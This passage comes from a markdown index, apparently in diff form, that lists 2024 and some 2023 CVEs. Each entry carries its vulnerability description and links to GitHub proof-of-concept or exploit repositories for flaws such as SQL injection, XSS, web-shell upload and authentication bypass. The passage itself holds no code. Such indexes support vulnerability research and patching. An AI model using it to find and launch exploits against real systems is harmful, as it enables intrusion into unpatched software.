+ + +- [canyie/MagiskEoP](https://github.com/canyie/MagiskEoP) + +### CVE-2024-48359 (2024-10-31) + +Qualitor v8.24 was discovered to contain a remote code execution (RCE) vulnerability via the gridValoresPopHidden parameter. + + +- [OpenXP-Research/CVE-2024-48359](https://github.com/OpenXP-Research/CVE-2024-48359) + +### CVE-2024-48360 (2024-10-31) + +Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php. + + +- [OpenXP-Research/CVE-2024-48360](https://github.com/OpenXP-Research/CVE-2024-48360) + +### CVE-2024-48392 +- [Renzusclarke/CVE-2024-48392-PoC](https://github.com/Renzusclarke/CVE-2024-48392-PoC) + +### CVE-2024-48415 (2024-10-22) + +itsourcecode Loan Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via a crafted payload to the lastname, firstname, middlename, address, contact_no, email and tax_id parameters in new borrowers functionality on the Borrowers page. + + +- [khaliquesX/CVE-2024-48415](https://github.com/khaliquesX/CVE-2024-48415) + +### CVE-2024-48427 (2024-10-24) + +A SQL injection vulnerability in Sourcecodester Packers and Movers Management System v1.0 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in /mpms/admin/?page=services/manage_service&id + + +- [vighneshnair7/CVE-2024-48427](https://github.com/vighneshnair7/CVE-2024-48427) + +### CVE-2024-48569 (2024-10-30) + +Proactive Risk Manager version 9.1.1.0 is affected by multiple Cross-Site Scripting (XSS) vulnerabilities in the add/edit form fields, at the urls starting with the subpaths: /ar/config/configuation/ and /ar/config/risk-strategy-control/ + + +- [MarioTesoro/CVE-2024-48569](https://github.com/MarioTesoro/CVE-2024-48569) + +### CVE-2024-48605 (2024-10-22) + +An issue in Helakuru Desktop Application v1.1 allows a local attacker to execute arbitrary code via the lack of proper validation of the wow64log.dll file. + + +- [surajhacx/HelakuruV.1.1-DLLHijack](https://github.com/surajhacx/HelakuruV.1.1-DLLHijack) + +### CVE-2024-48644 (2024-10-22) + +Accounts enumeration vulnerability in the Login Component of Reolink Duo 2 WiFi Camera (Firmware Version v3.0.0.1889_23031701) allows remote attackers to determine valid user accounts via login attempts. This can lead to the enumeration of user accounts and potentially facilitate other attacks, such as brute-forcing of passwords. The vulnerability arises from the application responding differently to login attempts with valid and invalid usernames. + + +- [rosembergpro/CVE-2024-48644](https://github.com/rosembergpro/CVE-2024-48644) + +### CVE-2024-48652 (2024-10-22) + +Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows remote attacker to execute arbitrary code via the content group name field. + + +- [paragbagul111/CVE-2024-48652](https://github.com/paragbagul111/CVE-2024-48652) + +### CVE-2024-48914 (2024-10-15) + +Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI. Patches are available in versions 3.0.5 and 2.3.3. Some workarounds are also available. One may use object storage rather than the local file system, e.g. MinIO or S3, or define middleware which detects and blocks requests with urls containing `/../`. + + +- [EQSTLab/CVE-2024-48914](https://github.com/EQSTLab/CVE-2024-48914) + +### CVE-2024-48955 (2024-10-29) + +Broken access control in NetAdmin 4.030319 returns data with functionalities on the endpoint that "assembles" the functionalities menus, the return of this call is not encrypted and as the system does not validate the session authorization, an attacker can copy the content of the browser of a user with greater privileges having access to the functionalities of the user that the code was copied. + + +- [BrotherOfJhonny/CVE-2024-48955_Overview](https://github.com/BrotherOfJhonny/CVE-2024-48955_Overview) + +### CVE-2024-48990 (2024-11-19) + +Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. + + +- [makuga01/CVE-2024-48990-PoC](https://github.com/makuga01/CVE-2024-48990-PoC) +- [ns989/CVE-2024-48990](https://github.com/ns989/CVE-2024-48990) +- [felmoltor/CVE-2024-48990](https://github.com/felmoltor/CVE-2024-48990) +- [Cyb3rFr0g/CVE-2024-48990-PoC](https://github.com/Cyb3rFr0g/CVE-2024-48990-PoC) +- [pentestfunctions/CVE-2024-48990-PoC-Testing](https://github.com/pentestfunctions/CVE-2024-48990-PoC-Testing) +- [r0xdeadbeef/CVE-2024-48990-exploit](https://github.com/r0xdeadbeef/CVE-2024-48990-exploit) +- [njeru-codes/needrestart-vulnerability-poc](https://github.com/njeru-codes/needrestart-vulnerability-poc) +- [ally-petitt/CVE-2024-48990-Exploit](https://github.com/ally-petitt/CVE-2024-48990-Exploit) + +### CVE-2024-49039 (2024-11-12) + +Windows Task Scheduler Elevation of Privilege Vulnerability + + +- [je5442804/WPTaskScheduler_CVE-2024-49039](https://github.com/je5442804/WPTaskScheduler_CVE-2024-49039) + +### CVE-2024-49203 (2024-11-20) + +Querydsl 5.1.0 and OpenFeign Querydsl 6.8 allows SQL/HQL injection in orderBy in JPAQuery. + + +- [CSIRTTrizna/CVE-2024-49203](https://github.com/CSIRTTrizna/CVE-2024-49203) + +### CVE-2024-49328 (2024-10-20) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Vivek Tamrakar WP REST API FNS allows Authentication Bypass.This issue affects WP REST API FNS: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-49328](https://github.com/RandomRobbieBF/CVE-2024-49328) + +### CVE-2024-49368 (2024-10-21) + +Nginx UI is a web user interface for the Nginx web server. Prior to version 2.0.0-beta.36, when Nginx UI configures logrotate, it does not verify the input and directly passes it to exec.Command, causing arbitrary command execution. Version 2.0.0-beta.36 fixes this issue. + + +- [Aashay221999/CVE-2024-49368](https://github.com/Aashay221999/CVE-2024-49368) + +### CVE-2024-49379 (2024-11-13) + +Umbrel is a home server OS for self-hosting. The login functionality of Umbrel before version 1.2.2 contains a reflected cross-site scripting (XSS) vulnerability in use-auth.tsx. An attacker can specify a malicious redirect query parameter to trigger the vulnerability. If a JavaScript URL is passed to the redirect parameter the attacker provided JavaScript will be executed after the user entered their password and clicked on login. This vulnerability is fixed in 1.2.2. + + +- [OHDUDEOKNICE/CVE-2024-49379](https://github.com/OHDUDEOKNICE/CVE-2024-49379) + +### CVE-2024-49681 (2024-10-24) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SWIT WP Sessions Time Monitoring Full Automatic allows SQL Injection.This issue affects WP Sessions Time Monitoring Full Automatic: from n/a through 1.0.9. + + +- [RandomRobbieBF/CVE-2024-49681](https://github.com/RandomRobbieBF/CVE-2024-49681) + +### CVE-2024-50251 (2024-11-09) + +In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_payload: sanitize offset and length before calling skb_checksum()\n\nIf access to offset + length is larger than the skbuff length, then\nskb_checksum() triggers BUG_ON().\n\nskb_checksum() internally subtracts the length parameter while iterating\nover skbuff, BUG_ON(len) at the end of it checks that the expected\nlength to be included in the checksum calculation is fully consumed. + + +- [slavin-ayu/CVE-2024-50251-PoC](https://github.com/slavin-ayu/CVE-2024-50251-PoC) + +### CVE-2024-50335 (2024-11-05) + +SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. The "Publish Key" field in SuiteCRM's Edit Profile page is vulnerable to Reflected Cross-Site Scripting (XSS), allowing an attacker to inject malicious JavaScript code. This can be exploited to steal CSRF tokens and perform unauthorized actions, such as creating new administrative users without proper authentication. The vulnerability arises due to insufficient input validation and sanitization of the Publish Key field within the SuiteCRM application. When an attacker injects a malicious script, it gets executed within the context of an authenticated user's session. The injected script (o.js) then leverages the captured CSRF token to forge requests that create new administrative users, effectively compromising the integrity and security of the CRM instance. This issue has been addressed in versions 7.14.6 and 8.7.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [shellkraft/CVE-2024-50335](https://github.com/shellkraft/CVE-2024-50335) + +### CVE-2024-50340 (2024-11-06) + +symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes. All users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [Nyamort/CVE-2024-50340](https://github.com/Nyamort/CVE-2024-50340) + +### CVE-2024-50395 (2024-11-22) + +An authorization bypass through user-controlled key vulnerability has been reported to affect Media Streaming add-on. If exploited, the vulnerability could allow local network attackers to gain privilege.\n\nWe have already fixed the vulnerability in the following version:\nMedia Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later + + +- [neko-hat/CVE-2024-50395](https://github.com/neko-hat/CVE-2024-50395) + +### CVE-2024-50427 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in Devsoft Baltic OÜ SurveyJS: Drag & Drop WordPress Form Builder.This issue affects SurveyJS: Drag & Drop WordPress Form Builder: from n/a through 1.9.136. + + +- [RandomRobbieBF/CVE-2024-50427](https://github.com/RandomRobbieBF/CVE-2024-50427) + +### CVE-2024-50450 (2024-10-28) + +Improper Control of Generation of Code ('Code Injection') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Injection.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n/a through 1.3.3.4. + + +- [RandomRobbieBF/CVE-2024-50450](https://github.com/RandomRobbieBF/CVE-2024-50450) + +### CVE-2024-50473 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in Ajar Productions Ajar in5 Embed allows Upload a Web Shell to a Web Server.This issue affects Ajar in5 Embed: from n/a through 3.1.3. + + +- [RandomRobbieBF/CVE-2024-50473](https://github.com/RandomRobbieBF/CVE-2024-50473) + +### CVE-2024-50475 (2024-10-29) + +Missing Authorization vulnerability in Scott Gamon Signup Page allows Privilege Escalation.This issue affects Signup Page: from n/a through 1.0. + + +- [RandomRobbieBF/CVE-2024-50475](https://github.com/RandomRobbieBF/CVE-2024-50475) + +### CVE-2024-50476 (2024-10-29) + +Missing Authorization vulnerability in GRÜN Software Group GmbH GRÜN spendino Spendenformular allows Privilege Escalation.This issue affects GRÜN spendino Spendenformular: from n/a through 1.0.1. + + +- [RandomRobbieBF/CVE-2024-50476](https://github.com/RandomRobbieBF/CVE-2024-50476) + +### CVE-2024-50477 (2024-10-28) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Stacks Stacks Mobile App Builder stacks-mobile-app-builder allows Authentication Bypass.This issue affects Stacks Mobile App Builder: from n/a through 5.2.3. + + +- [RandomRobbieBF/CVE-2024-50477](https://github.com/RandomRobbieBF/CVE-2024-50477) + +### CVE-2024-50478 (2024-10-28) + +Authentication Bypass by Primary Weakness vulnerability in Swoop 1-Click Login: Passwordless Authentication allows Authentication Bypass.This issue affects 1-Click Login: Passwordless Authentication: 1.4.5. + + +- [RandomRobbieBF/CVE-2024-50478](https://github.com/RandomRobbieBF/CVE-2024-50478) + +### CVE-2024-50482 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in Chetan Khandla Woocommerce Product Design allows Upload a Web Shell to a Web Server.This issue affects Woocommerce Product Design: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-50482](https://github.com/RandomRobbieBF/CVE-2024-50482) + +### CVE-2024-50483 (2024-10-28) + +Authorization Bypass Through User-Controlled Key vulnerability in Meetup allows Privilege Escalation.This issue affects Meetup: from n/a through 0.1. + + +- [RandomRobbieBF/CVE-2024-50483](https://github.com/RandomRobbieBF/CVE-2024-50483) + +### CVE-2024-50485 (2024-10-29) + +: Incorrect Privilege Assignment vulnerability in Udit Rawat Exam Matrix allows Privilege Escalation.This issue affects Exam Matrix: from n/a through 1.5. + + +- [RandomRobbieBF/CVE-2024-50485](https://github.com/RandomRobbieBF/CVE-2024-50485) + +### CVE-2024-50488 (2024-10-28) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Priyabrata Sarkar Token Login allows Authentication Bypass.This issue affects Token Login: from n/a through 1.0.3. + + +- [RandomRobbieBF/CVE-2024-50488](https://github.com/RandomRobbieBF/CVE-2024-50488) + +### CVE-2024-50490 (2024-10-29) + +Missing Authorization vulnerability in Szabolcs Szecsenyi PegaPoll allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects PegaPoll: from n/a through 1.0.2. + + +- [RandomRobbieBF/CVE-2024-50490](https://github.com/RandomRobbieBF/CVE-2024-50490) + +### CVE-2024-50493 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in masterhomepage Automatic Translation allows Upload a Web Shell to a Web Server.This issue affects Automatic Translation: from n/a through 1.0.4. + + +- [RandomRobbieBF/CVE-2024-50493](https://github.com/RandomRobbieBF/CVE-2024-50493) + +### CVE-2024-50498 (2024-10-28) + +Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console: from n/a through 1.0. + + +- [RandomRobbieBF/CVE-2024-50498](https://github.com/RandomRobbieBF/CVE-2024-50498) + +### CVE-2024-50657 (2024-11-22) + +An issue in Owncloud android apk v.4.3.1 allows a physically proximate attacker to escalate privileges via the PassCodeViewModel class, specifically in the checkPassCodeIsValid method + + +- [SAHALLL/CVE-2024-50657](https://github.com/SAHALLL/CVE-2024-50657) + +### CVE-2024-50803 (2024-11-19) + +The mediapool feature of the Redaxo Core CMS application v 5.17.1 is vulnerable to Cross Site Scripting(XSS) which allows a remote attacker to escalate privileges + + +- [Praison001/CVE-2024-50803-Redaxo](https://github.com/Praison001/CVE-2024-50803-Redaxo) + +### CVE-2024-50804 (2024-11-18) + +Insecure Permissions vulnerability in Micro-star International MSI Center Pro 2.1.37.0 allows a local attacker to execute arbitrary code via the Device_DeviceID.dat.bak file within the C:\ProgramData\MSI\One Dragon Center\Data folder + + +- [g3tsyst3m/CVE-2024-50804](https://github.com/g3tsyst3m/CVE-2024-50804) + +### CVE-2024-50848 (2024-11-18) + +An XML External Entity (XXE) vulnerability in the Import object and Translation Memory import functionalities of WorldServer v11.8.2 to access sensitive information and execute arbitrary commands via supplying a crafted .tmx file. + + +- [Wh1teSnak3/CVE-2024-50848](https://github.com/Wh1teSnak3/CVE-2024-50848) + +### CVE-2024-50849 (2024-11-18) + +A Stored Cross-Site Scripting (XSS) vulnerability in the "Rules" functionality of WorldServer v11.8.2 allows a remote authenticated attacker to execute arbitrary JavaScript code. + + +- [Wh1teSnak3/CVE-2024-50849](https://github.com/Wh1teSnak3/CVE-2024-50849) + +### CVE-2024-50961 +- [fdzdev/CVE-2024-50961](https://github.com/fdzdev/CVE-2024-50961) + +### CVE-2024-50962 +- [fdzdev/CVE-2024-50962](https://github.com/fdzdev/CVE-2024-50962) + +### CVE-2024-50964 +- [fdzdev/CVE-2024-50964](https://github.com/fdzdev/CVE-2024-50964) + +### CVE-2024-50968 (2024-11-14) + +A business logic vulnerability exists in the Add to Cart function of itsourcecode Agri-Trading Online Shopping System 1.0, which allows remote attackers to manipulate the quant parameter when adding a product to the cart. By setting the quantity value to -0, an attacker can exploit a flaw in the application's total price calculation logic. This vulnerability causes the total price to be reduced to zero, allowing the attacker to add items to the cart and proceed to checkout. + + +- [Akhlak2511/CVE-2024-50968](https://github.com/Akhlak2511/CVE-2024-50968) + +### CVE-2024-50969 (2024-11-13) + +A Reflected cross-site scripting (XSS) vulnerability in browse.php of Code-projects Jonnys Liquor 1.0 allows remote attackers to inject arbitrary web scripts or HTML via the search parameter. + + +- [Akhlak2511/CVE-2024-50969](https://github.com/Akhlak2511/CVE-2024-50969) + +### CVE-2024-50970 (2024-11-13) + +A SQL injection vulnerability in orderview1.php of Itsourcecode Online Furniture Shopping Project 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter. + + +- [Akhlak2511/CVE-2024-50970](https://github.com/Akhlak2511/CVE-2024-50970) + +### CVE-2024-50971 (2024-11-13) + +A SQL injection vulnerability in print.php of Itsourcecode Construction Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the map_id parameter. + + +- [Akhlak2511/CVE-2024-50971](https://github.com/Akhlak2511/CVE-2024-50971) + +### CVE-2024-50972 (2024-11-13) + +A SQL injection vulnerability in printtool.php of Itsourcecode Construction Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the borrow_id parameter. + + +- [Akhlak2511/CVE-2024-50972](https://github.com/Akhlak2511/CVE-2024-50972) + +### CVE-2024-50986 (2024-11-15) + +An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file. + + +- [riftsandroses/CVE-2024-50986](https://github.com/riftsandroses/CVE-2024-50986) + +### CVE-2024-51026 (2024-11-11) + +The NetAdmin IAM system (version 4.0.30319) has a Cross Site Scripting (XSS) vulnerability in the /BalloonSave.ashx endpoint, where it is possible to inject a malicious payload into the Content= field. + + +- [BrotherOfJhonny/CVE-2024-51026_Overview](https://github.com/BrotherOfJhonny/CVE-2024-51026_Overview) + +### CVE-2024-51030 (2024-11-08) + +A SQL injection vulnerability in manage_client.php and view_cab.php of Sourcecodester Cab Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter, leading to unauthorized access and potential compromise of sensitive data within the database. + + +- [vighneshnair7/CVE-2024-51030](https://github.com/vighneshnair7/CVE-2024-51030) + +### CVE-2024-51031 (2024-11-08) + +A Cross-site Scripting (XSS) vulnerability in manage_account.php in Sourcecodester Cab Management System 1.0 allows remote authenticated users to inject arbitrary web scripts via the "First Name," "Middle Name," and "Last Name" fields. + + +- [vighneshnair7/CVE-2024-51031](https://github.com/vighneshnair7/CVE-2024-51031) + +### CVE-2024-51032 (2024-11-08) + +A Cross-site Scripting (XSS) vulnerability in manage_recipient.php of Sourcecodester Toll Tax Management System 1.0 allows remote authenticated users to inject arbitrary web scripts via the "owner" input field. + + +- [Shree-Chandragiri/CVE-2024-51032](https://github.com/Shree-Chandragiri/CVE-2024-51032) + +### CVE-2024-51132 (2024-11-05) + +An XML External Entity (XXE) vulnerability in HAPI FHIR before v6.4.0 allows attackers to access sensitive information or execute arbitrary code via supplying a crafted request containing malicious XML entities. + + +- [JAckLosingHeart/CVE-2024-51132-POC](https://github.com/JAckLosingHeart/CVE-2024-51132-POC) + +### CVE-2024-51135 (2024-11-11) + +An XML External Entity (XXE) vulnerability in the component DocumentBuilderFactory of powertac-server v1.9.0 allows attackers to access sensitive information or execute arbitrary code via supplying a crafted request containing malicious XML entities. + + +- [JAckLosingHeart/CVE-2024-51135](https://github.com/JAckLosingHeart/CVE-2024-51135) + +### CVE-2024-51136 (2024-11-04) + +An XML External Entity (XXE) vulnerability in Dmoz2CSV in openimaj v1.3.10 allows attackers to access sensitive information or execute arbitrary code via supplying a crafted XML file. + + +- [JAckLosingHeart/CVE-2024-51136-POC](https://github.com/JAckLosingHeart/CVE-2024-51136-POC) + +### CVE-2024-51179 (2024-11-12) + +An issue in Open 5GS v.2.7.1 allows a remote attacker to cause a denial of service via the Network Function Virtualizations (NFVs) such as the User Plane Function (UPF) and the Session Management Function (SMF), The Packet Data Unit (PDU) session establishment process. + + +- [Lakshmirnr/CVE-2024-51179](https://github.com/Lakshmirnr/CVE-2024-51179) + +### CVE-2024-51358 (2024-11-05) + +An issue in Linux Server Heimdall v.2.6.1 allows a remote attacker to execute arbitrary code via a crafted script to the Add new application. + + +- [Kov404/CVE-2024-51358](https://github.com/Kov404/CVE-2024-51358) + +### CVE-2024-51378 (2024-10-29) + +getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected. + + +- [refr4g/CVE-2024-51378](https://github.com/refr4g/CVE-2024-51378) + +### CVE-2024-51430 (2024-10-31) + +Cross Site Scripting vulnerability in online diagnostic lab management system using php v.1.0 allows a remote attacker to execute arbitrary code via the Test Name parameter on the diagnostic/add-test.php component. + + +- [BLACK-SCORP10/CVE-2024-51430](https://github.com/BLACK-SCORP10/CVE-2024-51430) + +### CVE-2024-51435 +- [bevennyamande/CVE-2024-51435](https://github.com/bevennyamande/CVE-2024-51435) + +### CVE-2024-51567 (2024-10-29) + +upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected. + + +- [ajayalf/CVE-2024-51567](https://github.com/ajayalf/CVE-2024-51567) +- [thehash007/CVE-2024-51567-RCE-EXPLOIT](https://github.com/thehash007/CVE-2024-51567-RCE-EXPLOIT) +- [XiaomingX/cve-2024-51567-poc](https://github.com/XiaomingX/cve-2024-51567-poc) + +### CVE-2024-51665 (2024-11-04) + +Server-Side Request Forgery (SSRF) vulnerability in Noor alam Magical Addons For Elementor allows Server Side Request Forgery.This issue affects Magical Addons For Elementor: from n/a through 1.2.1. + + +- [RandomRobbieBF/CVE-2024-51665](https://github.com/RandomRobbieBF/CVE-2024-51665) + +### CVE-2024-51747 (2024-11-11) + +Kanboard is project management software that focuses on the Kanban methodology. An authenticated Kanboard admin can read and delete arbitrary files from the server. File attachments, that are viewable or downloadable in Kanboard are resolved through its `path` entry in the `project_has_files` SQLite db. Thus, an attacker who can upload a modified sqlite.db through the dedicated feature, can set arbitrary file links, by abusing path traversals. Once the modified db is uploaded and the project page is accessed, a file download can be triggered and all files, readable in the context of the Kanboard application permissions, can be downloaded. This issue has been addressed in version 1.2.42 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [l20170217b/CVE-2024-51747](https://github.com/l20170217b/CVE-2024-51747) + +### CVE-2024-52301 (2024-11-12) + +Laravel is a web application framework. When the register_argc_argv php directive is set to on , and users call any URL with a special crafted query string, they are able to change the environment used by the framework when handling the request. The vulnerability fixed in 6.20.45, 7.30.7, 8.83.28, 9.52.17, 10.48.23, and 11.31.0. The framework now ignores argv values for environment detection on non-cli SAPIs. + + +- [Nyamort/CVE-2024-52301](https://github.com/Nyamort/CVE-2024-52301) +- [martinhaunschmid/CVE-2024-52301-Research](https://github.com/martinhaunschmid/CVE-2024-52301-Research) + +### CVE-2024-52302 (2024-11-14) + +common-user-management is a robust Spring Boot application featuring user management services designed to control user access dynamically. There is a critical security vulnerability in the application endpoint /api/v1/customer/profile-picture. This endpoint allows file uploads without proper validation or restrictions, enabling attackers to upload malicious files that can lead to Remote Code Execution (RCE). + + +- [d3sca/CVE-2024-52302](https://github.com/d3sca/CVE-2024-52302) + +### CVE-2024-52316 (2024-11-18) + +Unchecked Error Condition vulnerability in Apache Tomcat. If Tomcat is configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not fail, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M26, from 10.1.0-M1 through 10.1.30, from 9.0.0-M1 through 9.0.95.\n\nUsers are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fix the issue. + + +- [TAM-K592/CVE-2024-52316](https://github.com/TAM-K592/CVE-2024-52316) + +### CVE-2024-52317 (2024-11-18) + +Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests \ncould lead to request and/or response mix-up between users.\n\nThis issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95.\n\nUsers are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue. + + +- [TAM-K592/CVE-2024-52317](https://github.com/TAM-K592/CVE-2024-52317) + +### CVE-2024-52318 (2024-11-18) + +Incorrect object recycling and reuse vulnerability in Apache Tomcat.\n\nThis issue affects Apache Tomcat: 11.0.0, 10.1.31, 9.0.96.\n\nUsers are recommended to upgrade to version 11.0.1, 10.1.32 or 9.0.97, which fixes the issue. + + +- [TAM-K592/CVE-2024-52318](https://github.com/TAM-K592/CVE-2024-52318) + +### CVE-2024-52380 (2024-11-14) + +Unrestricted Upload of File with Dangerous Type vulnerability in Softpulse Infotech Picsmize allows Upload a Web Shell to a Web Server.This issue affects Picsmize: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-52380](https://github.com/RandomRobbieBF/CVE-2024-52380) + +### CVE-2024-52382 (2024-11-14) + +Missing Authorization vulnerability in Medma Technologies Matix Popup Builder allows Privilege Escalation.This issue affects Matix Popup Builder: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-52382](https://github.com/RandomRobbieBF/CVE-2024-52382) + +### CVE-2024-52429 (2024-11-18) + +Unrestricted Upload of File with Dangerous Type vulnerability in Anton Hoelstad WP Quick Setup allows Upload a Web Shell to a Web Server.This issue affects WP Quick Setup: from n/a through 2.0. + + +- [RandomRobbieBF/CVE-2024-52429](https://github.com/RandomRobbieBF/CVE-2024-52429) + +### CVE-2024-52430 (2024-11-18) + +Deserialization of Untrusted Data vulnerability in Lis Lis Video Gallery allows Object Injection.This issue affects Lis Video Gallery: from n/a through 0.2.1. + + +- [RandomRobbieBF/CVE-2024-52430](https://github.com/RandomRobbieBF/CVE-2024-52430) + +### CVE-2024-52433 (2024-11-18) + +Deserialization of Untrusted Data vulnerability in Mindstien Technologies My Geo Posts Free allows Object Injection.This issue affects My Geo Posts Free: from n/a through 1.2. + + +- [RandomRobbieBF/CVE-2024-52433](https://github.com/RandomRobbieBF/CVE-2024-52433) + +### CVE-2024-52475 (2024-11-28) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Automation Web Platform Wawp allows Authentication Bypass.This issue affects Wawp: from n/a before 3.0.18. + + +- [ubaii/CVE-2024-52475](https://github.com/ubaii/CVE-2024-52475) + +### CVE-2024-52711 (2024-11-19) + +DI-8100 v16.07.26A1 is vulnerable to Buffer Overflow In the ip_position_asp function via the ip parameter. + + +- [14mb1v45h/cyberspace-CVE-2024-52711](https://github.com/14mb1v45h/cyberspace-CVE-2024-52711) + +### CVE-2024-52940 (2024-11-18) + +AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inadvertently exposes a public IP address within network traffic. The attacker must know the victim's AnyDesk ID. + + +- [ebrasha/abdal-anydesk-remote-ip-detector](https://github.com/ebrasha/abdal-anydesk-remote-ip-detector) + +### CVE-2024-53255 (2024-11-25) + +BoidCMS is a free and open-source flat file CMS for building simple websites and blogs, developed using PHP and uses JSON as a database. In affected versions a reflected Cross-site Scripting (XSS) vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code. This code could be used to steal the user's session cookie, perform phishing attacks, or deface the website. This issue has been addressed in version 2.1.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [0x4M3R/CVE-2024-53255](https://github.com/0x4M3R/CVE-2024-53255) + +### CVE-2024-53375 +- [ThottySploity/CVE-2024-53375](https://github.com/ThottySploity/CVE-2024-53375) + +### CVE-2024-1642470 +- [Symbolexe/CVE-2024-1642470](https://github.com/Symbolexe/CVE-2024-1642470) + ## 2023 +### CVE-2023-0045 (2023-04-25) + +The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall. The ib_prctl_set  function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected on the BTB, prior to the prctl syscall.  The patch that added the support for the conditional mitigation via prctl (ib_prctl_set) dates back to the kernel 4.9.176.\n\nWe recommend upgrading past commit a664ec9158eeddd75121d39c9a0758016097fa96\n\n + + +- [ASkyeye/CVE-2023-0045](https://github.com/ASkyeye/CVE-2023-0045) +- [es0j/CVE-2023-0045](https://github.com/es0j/CVE-2023-0045) + +### CVE-2023-0099 (2023-02-13) + +The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + + +- [amirzargham/CVE-2023-0099-exploit](https://github.com/amirzargham/CVE-2023-0099-exploit) + +### CVE-2023-0156 (2023-04-10) + +The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit what log files to display in it's settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file. + + +- [b0marek/CVE-2023-0156](https://github.com/b0marek/CVE-2023-0156) + +### CVE-2023-0157 (2023-04-10) + +The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page. + + +- [b0marek/CVE-2023-0157](https://github.com/b0marek/CVE-2023-0157) + +### CVE-2023-0159 (2023-02-13) + +The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. + + +- [im-hanzou/EVCer](https://github.com/im-hanzou/EVCer) + +### CVE-2023-0179 (2023-03-27) + +A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution. + + +- [TurtleARM/CVE-2023-0179-PoC](https://github.com/TurtleARM/CVE-2023-0179-PoC) +- 